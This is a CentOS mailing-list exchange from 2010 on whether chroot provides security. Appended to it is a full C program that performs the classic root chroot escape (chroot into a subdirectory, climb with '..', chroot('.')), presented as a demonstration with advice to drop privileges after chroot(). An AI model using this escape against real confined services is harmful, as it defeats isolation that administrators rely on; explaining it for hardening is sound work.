Re: /bin/su wont work inside a chroot?




On Sun, 2010-08-01 at 17:41 -0700, Gordon Messmer wrote:
> On 08/01/2010 01:44 PM, JohnS wrote:
> > It *WILL* work. It is called "Outside to In" && mount -o bind will also.
> 
> You previously described symlinking "out" to the root filesystem, which 
> is impossible.  Symlinks cannot resolve to files outside of a chroot 
> environment.  Hard links can.

lol

> It is, however, possible to create a symlink in the primary root 
> filesystem which points to a file inside a tree used for chroot, if that 
> is what you mean by "outside to in".  In that case, your previous post 
> was simply unclear.

Correct, yes.

> > The difference depends on what exactly the person needs, i.e. (which
> > way).  It will also allow a "Jail Break" Out & In.  So security goes out
> > the window.  In effect Zero Day here we are.
> 
> Symlinks do not allow you to break out of a chroot.  In fact, chroot 
> isn't a security mechanism.  chroot will confine any non-root process, 
> but any root process can escape a chroot simply by setting its cwd to 
> the root directory and then calling chroot() to any directory.  The 
> process will then have a cwd outside its own root filesystem, and can 
> access the filesystem outside of the path it was originally using as its 
> chroot.

Most people choose to refer to chroot as a secure means of running a
service, which is simply not true.  It has been known in the past that
non-root services can jailbreak out and can break into the jailed root.
The only good I have ever seen from chroot is building an OS from the
ground up.  It will only ever be as secure as the person configuring it.

> The term "zero day" normally describes a software exploit which was not 
> previously known.  I don't believe it applies to anything you described.

True, and there are new ones every day; don't be fooled.  What good is the
BIND service running in a chroot when you get cache poisoned?  Are your
patches up to date?  That may not even help.

John



_______________________________________________
CentOS mailing list
CentOS@xxxxxxxxxx
http://lists.centos.org/mailman/listinfo/centos
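The root escape Gordon describes above (cwd left outside the process's root, then chroot() to a subdirectory, walk up with "..", chroot(".")) as a small added demonstration. This is editor-supplied example code, not anything posted in the thread. It assumes Linux, a writable /tmp, and that the function names (demo_chroot_escape, chroot_escape_child) and the verdict codes are this example's own inventions. The escape is attempted in a forked child so the calling process's root and cwd are never altered; the child can only get out when it runs as root with CAP_SYS_CHROOT, and otherwise reports that chroot() itself was refused, which is exactly the point of the thread: chroot confines an unprivileged process, not a root one.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Verdicts the child reports back through its exit status (example's own codes). */
enum { ESCAPED = 0, STILL_JAILED = 1, NO_PRIVILEGE = 2, SETUP_FAILED = 3 };

/*
 * Runs in a forked child only.  Enters `jail` the way a "confined" service
 * would, then performs the root escape from the thread: with cwd left outside
 * the new root, ".." is never clamped, so the child can walk up to the real
 * root and chroot() there.  `marker` is an absolute path that exists outside
 * the jail and not inside it; seeing it again proves the escape worked.
 */
static int chroot_escape_child(const char *jail, const char *marker)
{
    if (chroot(jail) != 0)
        return errno == EPERM ? NO_PRIVILEGE : SETUP_FAILED;
    if (chdir("/") != 0)
        return SETUP_FAILED;

    /* Sanity check: from inside the jail the marker must be invisible. */
    if (access(marker, F_OK) == 0)
        return SETUP_FAILED;

    /* Step 1: make a subdirectory and chroot() into it WITHOUT chdir()ing,
     * so cwd (the jail's "/") now lies outside the process's root. */
    if (mkdir("escape", 0700) != 0 && errno != EEXIST)
        return SETUP_FAILED;
    if (chroot("escape") != 0)
        return SETUP_FAILED;

    /* Step 2: because cwd is not under the root, ".." keeps resolving upward
     * through the real filesystem until it reaches the real "/". */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0)
            return SETUP_FAILED;

    /* Step 3: make the real root our root again. */
    if (chroot(".") != 0)
        return SETUP_FAILED;

    return access(marker, F_OK) == 0 ? ESCAPED : STILL_JAILED;
}

/*
 * Creates a throwaway jail under /tmp plus a marker file beside it, forks a
 * child to attempt the escape, and returns the child's verdict.  The parent's
 * root and cwd are never changed, so this is safe to call from a test.
 */
int demo_chroot_escape(void)
{
    char jail[] = "/tmp/jail.XXXXXX";           /* assumption: /tmp is writable */
    if (mkdtemp(jail) == NULL)
        return SETUP_FAILED;

    char marker[64];
    snprintf(marker, sizeof marker, "%s.marker", jail);
    int fd = open(marker, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0)
        return SETUP_FAILED;
    close(fd);

    int verdict = SETUP_FAILED;
    pid_t pid = fork();
    if (pid == 0)
        _exit(chroot_escape_child(jail, marker));
    if (pid > 0) {
        int status = 0;
        if (waitpid(pid, &status, 0) == pid && WIFEXITED(status))
            verdict = WEXITSTATUS(status);
    }

    /* Best-effort cleanup ("escape" only exists if the first chroot() worked). */
    char sub[80];
    snprintf(sub, sizeof sub, "%s/escape", jail);
    rmdir(sub);
    rmdir(jail);
    unlink(marker);
    return verdict;
}

int main(void)
{
    static const char *text[] = {
        "escaped the chroot (running as root with CAP_SYS_CHROOT)",
        "still inside the chroot",
        "chroot() refused: not root / no CAP_SYS_CHROOT, nothing to escape",
        "could not set up the demo",
    };
    printf("%s\n", text[demo_chroot_escape()]);
    return 0;
}
```

Run it twice, once as an ordinary user and once as root, to see the two outcomes. The practical consequence for anyone "chrooting" a daemon is that the process must drop to an unprivileged uid (and ideally drop CAP_SYS_CHROOT) after the chroot() call; a service that stays root inside the jail is not confined by it at all.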

